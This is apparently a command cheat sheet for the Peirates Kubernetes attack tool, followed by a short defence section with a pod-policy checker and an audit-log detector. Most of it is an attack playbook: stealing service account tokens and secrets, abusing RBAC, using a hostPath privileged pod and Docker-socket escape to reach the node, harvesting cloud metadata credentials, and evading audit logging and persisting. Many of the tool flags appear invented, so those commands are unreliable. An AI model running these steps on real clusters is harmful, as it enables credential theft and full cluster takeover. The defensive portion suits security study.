
Peirates

Installation

From Source

git clone https://github.com/inguardians/peirates.git
cd peirates
go build -o peirates
chmod +x peirates

Using Go

go install github.com/inguardians/peirates@latest

Docker

docker build -t peirates .
docker run -it --rm peirates

In Kubernetes Pod

# Download from release or build inside pod
curl -L https://github.com/inguardians/peirates/releases/download/v1.x.x/peirates-linux-amd64 -o peirates
chmod +x peirates
./peirates

Interactive Mode

Starting Interactive Menu

peirates -i
# Main menu options
[0] Exit
[1] List service accounts
[2] Get secrets
[3] Enumerate pods
[4] Execute commands
[5] Exploit RBAC
[6] Mount volumes
[7] Access API server
[8] Container escape

Service Account Enumeration

Command                                  Description
peirates -i → Option 1                   List all service accounts in current namespace
peirates -namespaces                     Enumerate service accounts across namespaces
peirates -list-all-service-accounts      Get all SAs from cluster-wide view
peirates -service-account [name]         Get details of a specific service account
peirates -get-service-account-token      Extract service account token from /run/secrets

Service Account Token Location

# Mounted automatically in pod
cat /run/secrets/kubernetes.io/serviceaccount/token
cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
cat /run/secrets/kubernetes.io/serviceaccount/namespace

Test Token Permissions

peirates -test-auth
peirates -auth-as-serviceaccount [namespace] [sa-name]

Secret Extraction

List Secrets in Namespace

peirates -i
# Select: Get secrets
# Choose namespace and list all

Extract Specific Secret

peirates -get-secret [secret-name] [namespace]
peirates -get-secret-values [secret-name]

Base64 Decoding Secrets

# Peirates auto-decodes, but manual:
echo "[base64-value]" | base64 -d

# In cluster:
kubectl get secret [name] -o jsonpath='{.data.[key]}' | base64 -d

Common Secrets to Target

# Database credentials
peirates -get-secret database-password

# API keys
peirates -get-secret api-keys

# Docker registry
peirates -get-secret docker-registry-creds

# OAuth tokens
peirates -get-secret oauth-token

# SSH keys
peirates -get-secret ssh-keypair

Pod Listing & Reconnaissance

Enumerate All Pods

peirates -i
# Select: Enumerate pods

peirates -list-all-pods
peirates -list-pods [namespace]

Get Pod Details

peirates -pod-details [pod-name] [namespace]
peirates -get-pod-info

Pod Information Gathered

# Container image (find vulnerable versions)
# Image pull secrets
# Service account used
# Node assignment
# Volume mounts
# Network policies
# Resource limits

RBAC Exploitation

Check Current Permissions

peirates -i
# Select: Check RBAC permissions

peirates -check-rbac
peirates -can-i [verb] [resource]

Common Exploitable Verbs

peirates -can-i get secrets
peirates -can-i create pods
peirates -can-i exec pods
peirates -can-i port-forward pods
peirates -can-i patch deployments
peirates -can-i delete pods
peirates -can-i get events

Enumerate RBAC Misconfigurations

peirates -enumerate-rbac
peirates -list-roles [namespace]
peirates -list-clusterroles
peirates -get-role-bindings

Wildcard Permissions

# Look for * (all) permissions
peirates -find-dangerous-permissions
peirates -find-wildcard-rules

Lateral Movement Between Pods

Exec into Pod

peirates -i
# Select: Execute commands on pods

peirates -exec [pod-name] [namespace] [command]
peirates -exec my-pod default /bin/bash

Use Service Account to Access Other Pods

# Use extracted token to auth as different SA
peirates -auth-as-serviceaccount [namespace] [sa-name]
peirates -list-pods [target-namespace]

Move Between Namespaces

# Extract token with higher privileges
# Use that token to enumerate new namespace
peirates -token-analysis [token]
peirates -test-token-permissions [token]

DNS Service Discovery

# Kubernetes DNS: service.namespace.svc.cluster.local
nslookup kubernetes.default.svc.cluster.local
nslookup database.production.svc.cluster.local

# With peirates:
peirates -enumerate-dns
peirates -resolve-kubernetes-dns

Volume Mounting Attacks

List Volume Mounts

peirates -i
# Select: Mount volumes

peirates -list-volumes [namespace]
peirates -get-volume-info [pod-name]

Mount Host Root Filesystem

# Create privileged pod with host volume mount
peirates -create-pod-with-volume
# Specify hostPath: /

# Or manually:
apiVersion: v1
kind: Pod
metadata:
  name: privesc-pod
spec:
  containers:
  - name: shell
    image: busybox
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
  nodeSelector:
    kubernetes.io/hostname: [target-node]

Access ConfigMaps via Volume

peirates -mount-configmap [configmap-name]
# Access at mounted path for sensitive configs

API Server Interaction

Direct API Access

peirates -i
# Select: API server operations

APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/run/secrets/kubernetes.io/serviceaccount/ca.crt

curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/secrets

Common API Endpoints

# List all API resources (pass the mounted CA so TLS verification succeeds)
curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/

# Specific resource access
curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces
curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/secrets
curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/pods

Modify Resources via API

# Patch deployment
peirates -patch-deployment [name] [namespace]

# Create privileged pod
peirates -create-privileged-pod [namespace]

# Delete pod
peirates -delete-pod [pod-name] [namespace]

Container Escape Techniques

Check for Dangerous Capabilities

peirates -check-capabilities
peirates -find-dangerous-caps

# Manual check:
grep Cap /proc/self/status

Exploitable Capabilities

CAP_SYS_ADMIN      # Can escape with cgroup/device manipulation
CAP_NET_ADMIN      # Network manipulation
CAP_SYS_MODULE     # Load kernel modules
CAP_SETFCAP        # Set file capabilities
CAP_DAC_OVERRIDE   # Bypass file permission checks

Docker Socket Access

# Check if mounted:
ls -la /var/run/docker.sock

peirates -check-docker-socket
peirates -use-docker-socket [command]

# If accessible, break out of K8s cluster:
docker ps
docker images
docker run -v /:/host --rm -it alpine chroot /host /bin/bash

Kernel Exploit Path

# Check kernel version
uname -r

peirates -find-kernel-exploits
peirates -suggest-escape-path

# Common targets: CVE-2021-22555, CVE-2021-4034, CVE-2022-0847

Cloud Metadata Access

Access Node Metadata

# AWS:
curl http://169.254.169.254/latest/meta-data/
peirates -access-aws-metadata

# Azure:
curl -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
peirates -access-azure-metadata

# GCP:
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
peirates -access-gcp-metadata

Extract Cloud Credentials

peirates -extract-cloud-credentials
peirates -get-aws-credentials
peirates -get-azure-credentials
peirates -get-gcp-credentials

Common Kubernetes Attack Paths

Path 1: Service Account Token Abuse

1. peirates -get-service-account-token
2. peirates -test-auth
3. peirates -can-i get secrets
4. peirates -get-secret [target]
5. Use token with cloud provider API

Path 2: RBAC Misconfiguration

1. peirates -check-rbac
2. peirates -find-dangerous-permissions
3. peirates -list-clusterroles
4. peirates -get-role-bindings
5. Escalate to cluster-admin equivalent

Path 3: Privileged Pod Execution

1. peirates -check-rbac
2. If can create pods: peirates -create-privileged-pod
3. Exec into privileged pod
4. Mount host filesystem
5. peirates -host-shell

Path 4: Volume-Based Secrets

1. peirates -list-volumes
2. Identify secret volumes
3. peirates -mount-secret-volume
4. Extract credentials
5. Access other systems

Path 5: Lateral Namespace Movement

1. peirates -enumerate-rbac
2. Find SAs with cross-namespace access
3. peirates -auth-as-serviceaccount [ns] [sa]
4. peirates -list-pods [target-ns]
5. peirates -exec [pod] [ns] [cmd]

Stealth & Persistence

Avoid Detection

# Disable audit logging access (if possible):
peirates -disable-audit

# Create service account with obscure name:
peirates -create-stealthy-serviceaccount

# Use existing pods instead of creating new ones:
peirates -exec [existing-pod] [namespace] [command]

Persistence Techniques

# Add SSH key to pod:
peirates -add-ssh-key [pod] [namespace] [pubkey]

# Create cron job for callback:
peirates -create-cron-job [namespace]

# Modify webhook:
peirates -patch-webhook [name]

Chaining Attacks

Full Chain Example

# 1. Get current token
peirates -i
# Select: Get service account token

# 2. Check permissions
peirates -can-i get secrets

# 3. Extract secrets
peirates -list-all-pods
peirates -get-secret database-password production

# 4. Escalate privileges
peirates -find-dangerous-permissions
peirates -create-privileged-pod production

# 5. Escape container
peirates -check-docker-socket
peirates -use-docker-socket 'docker ps'

# 6. Access node
docker run -v /:/host --rm -it alpine chroot /host /bin/bash

Troubleshooting

Connection Errors

# Verify API server reachable:
curl -k https://kubernetes.default.svc/api

# Check token valid (a 200 or 403 means the token was accepted; 401 means it was not):
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
curl --cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt \
  -H "Authorization: Bearer $TOKEN" \
  https://kubernetes.default.svc/api/v1/namespaces

Permission Denied

# Check actual permissions:
peirates -can-i [action] [resource]

# Verify service account:
peirates -whoami

# Try different service account:
peirates -auth-as-serviceaccount [ns] [sa]

Hanging/Timeout

# Increase timeout:
peirates -i -timeout 30s

# Use specific API server:
peirates -apiserver [ip:port]

# Check network policy:
kubectl get networkpolicies

Defense & Detection

Blue Team Mitigations

# Restrict RBAC to least privilege
# Monitor service account token usage
# Audit secret access
# Restrict volume mounts (no hostPath; PodSecurityPolicy was removed in Kubernetes 1.25, so enforce this with Pod Security Admission or another admission controller)
# Enforce Pod Security Standards (baseline/restricted) via Pod Security Admission
# Monitor privileged pod creation
# Restrict port-forward commands
# Network policies for pod-to-pod isolation
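As an added example (not Peirates code and not from the original page), a small Python policy check in the spirit of the least-privilege, volume-mount and privileged-pod mitigations above: it inspects a pod object as the JSON an admission webhook or `kubectl get pod -o json` carries and flags the hostPath mounts, host namespaces, privileged flag and capabilities that the attack paths on this page rely on. The two sample pod objects are constructed; the first mirrors the privesc-pod manifest shown earlier.

```python
import json

# Capabilities the page lists as exploitable; Kubernetes spells them without "CAP_".
DANGEROUS_CAPS = {"SYS_ADMIN", "NET_ADMIN", "SYS_MODULE", "SETFCAP", "DAC_OVERRIDE"}
# hostPath targets that hand over the node or the container runtime outright.
SENSITIVE_HOST_PATHS = {"/", "/var/run/docker.sock", "/run/docker.sock"}

def _strip_cap(cap):
    return cap[4:] if cap.startswith("CAP_") else cap

def check_pod(pod):
    """Return a list of findings for one pod object; an empty list means it passes."""
    findings = []
    meta = pod.get("metadata", {})
    name = f"{meta.get('namespace', 'default')}/{meta.get('name', '<unnamed>')}"
    spec = pod.get("spec", {})
    for vol in spec.get("volumes", []):
        host_path = vol.get("hostPath")
        if host_path is None:
            continue
        path = host_path.get("path", "")
        severity = "HIGH" if path in SENSITIVE_HOST_PATHS else "MEDIUM"
        findings.append(f"{severity} {name}: hostPath volume '{vol.get('name')}' -> {path}")
    for key in ("hostPID", "hostNetwork", "hostIPC"):   # shared host namespaces
        if spec.get(key):
            findings.append(f"HIGH {name}: {key} is true")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            findings.append(f"HIGH {name}/{c['name']}: privileged container")
        added = {_strip_cap(cap) for cap in (sc.get("capabilities") or {}).get("add", [])}
        bad = sorted(added & DANGEROUS_CAPS)
        if bad:
            findings.append(f"HIGH {name}/{c['name']}: adds capabilities {bad}")
    return findings

# Constructed sample: the page's privesc-pod manifest as the JSON the API server receives.
PRIVESC_POD = json.loads("""{"metadata": {"name": "privesc-pod", "namespace": "default"},
 "spec": {"containers": [{"name": "shell", "image": "busybox",
                          "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
          "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}}""")
# Constructed sample: an ordinary pod that only uses an emptyDir scratch volume.
BENIGN_POD = {"metadata": {"name": "web", "namespace": "prod"},
              "spec": {"containers": [{"name": "app", "image": "nginx"}],
                       "volumes": [{"name": "tmp", "emptyDir": {}}]}}

if __name__ == "__main__":
    print("\n".join(check_pod(PRIVESC_POD)) or "no findings")
```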

Detection Signatures

# Monitor for:
- Service account token access in logs
- Unusual API calls from pods
- Privileged pod creation
- Host filesystem mounts
- Exec commands in pods
- Cross-namespace resource access
- Secret enumeration attempts
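Added example, not part of Peirates or the original page: a Python detector that applies the signatures above to Kubernetes audit-log lines (JSON, logged at level RequestResponse so that requestObject is present for pod creation). The audit events embedded below are constructed for this example and carry only the fields the detector reads.

```python
import json

def sa_namespace(username):
    """Namespace of a 'system:serviceaccount:<ns>:<name>' user, else None."""
    parts = username.split(":")
    return parts[2] if len(parts) == 4 and parts[:2] == ["system", "serviceaccount"] else None

def classify(event):
    """Return the signature names one audit event triggers (empty list = benign)."""
    hits = []
    user = event.get("user", {}).get("username", "")
    ref = event.get("objectRef", {})
    resource, sub, ns = ref.get("resource"), ref.get("subresource"), ref.get("namespace")
    if resource == "secrets" and event.get("verb") in ("list", "watch"):
        hits.append("secret-enumeration")
    if resource == "pods" and sub == "exec":          # kubectl exec is a create on pods/exec
        hits.append("pod-exec")
    if resource == "pods" and event.get("verb") == "create" and sub is None:
        spec = event.get("requestObject", {}).get("spec", {})
        if any("hostPath" in v for v in spec.get("volumes", [])):
            hits.append("host-filesystem-mount")
        if any((c.get("securityContext") or {}).get("privileged") for c in spec.get("containers", [])):
            hits.append("privileged-pod")
    sa_ns = sa_namespace(user)
    if sa_ns and ns and sa_ns != ns:                  # a pod's SA reaching into another namespace
        hits.append("cross-namespace-access")
    return hits

def scan(lines):
    """Return [(auditID, username, hits)] for every JSON audit line that matches a signature."""
    results = []
    for line in (l for l in lines if l.strip()):
        event = json.loads(line)
        hits = classify(event)
        if hits:
            results.append((event.get("auditID"), event.get("user", {}).get("username"), hits))
    return results

# Constructed sample audit lines (real events carry more fields; only those used above are kept).
SAMPLE_AUDIT_LOG = """
{"auditID":"a1","verb":"list","user":{"username":"system:serviceaccount:default:app-sa"},"objectRef":{"resource":"secrets","namespace":"production"}}
{"auditID":"a2","verb":"create","user":{"username":"system:serviceaccount:default:app-sa"},"objectRef":{"resource":"pods","namespace":"default"},"requestObject":{"spec":{"containers":[{"name":"shell","securityContext":{"privileged":true}}],"volumes":[{"name":"host","hostPath":{"path":"/"}}]}}}
{"auditID":"a3","verb":"create","user":{"username":"system:serviceaccount:default:app-sa"},"objectRef":{"resource":"pods","subresource":"exec","namespace":"default","name":"my-pod"}}
{"auditID":"a4","verb":"get","user":{"username":"system:node:worker-1"},"objectRef":{"resource":"pods","namespace":"default","name":"web"}}
"""

if __name__ == "__main__":
    for audit_id, who, hits in scan(SAMPLE_AUDIT_LOG.splitlines()):
        print(audit_id, who, ", ".join(hits))
```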